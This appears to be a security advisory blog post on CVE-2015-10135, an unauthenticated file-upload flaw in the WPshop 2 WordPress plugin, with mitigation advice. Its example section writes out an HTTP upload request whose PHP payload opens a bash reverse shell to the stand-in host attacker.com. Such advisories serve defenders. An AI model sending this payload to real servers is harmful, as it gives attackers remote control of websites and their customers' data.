Overview
This blog post will detail an important vulnerability that affects the WPshop 2 E-Commerce plugin for WordPress. The vulnerability, known as CVE-2015-10135, allows for arbitrary file uploads due to missing file type validation in certain versions of the plugin. This flaw can potentially lead to system compromise or data leakage, making it a serious threat to any website that uses the affected plugin. Given the widespread use of WordPress for e-commerce and the popularity of the WPshop plugin, this vulnerability poses a substantial risk to online businesses and their customers.
Vulnerability Summary
CVE ID: CVE-2015-10135
Severity: Critical (9.8/10 on the CVSS scale)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Unauthenticated attackers can upload arbitrary files to the server potentially leading to system compromise or data leakage.
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
WPshop 2 E-Commerce for WordPress | All versions prior to 1.3.9.6
How the Exploit Works
The vulnerability exists in the ajaxUpload function of the WPshop plugin. This function is used to handle file uploads, but it lacks proper file type validation checks. As a result, an unauthenticated attacker can send a specially crafted HTTP request to upload any file type to the server. This includes executable files or scripts that can be run on the server, leading to remote code execution.
Conceptual Example Code
Here is a conceptual example of how the vulnerability might be exploited. This is a sample HTTP POST request that uploads a malicious PHP file.
POST /wp-content/plugins/wpshop/includes/ajax.php HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="malicious.php"
Content-Type: application/x-php
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/attacker.com/4444 0>&1'"); ?>
------WebKitFormBoundary--In this example, the PHP file contains a command that opens a reverse shell to the attacker’s server, effectively granting them remote access to the server.
Mitigation Advice
The vendor has addressed this vulnerability in version 1.3.9.6 of the WPshop plugin. All users are strongly advised to update to this version or later. If immediate patching is not possible, users may consider using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to detect and block attempts to exploit this vulnerability. However, these are temporary mitigations and updating the plugin should be prioritized to fully resolve the vulnerability.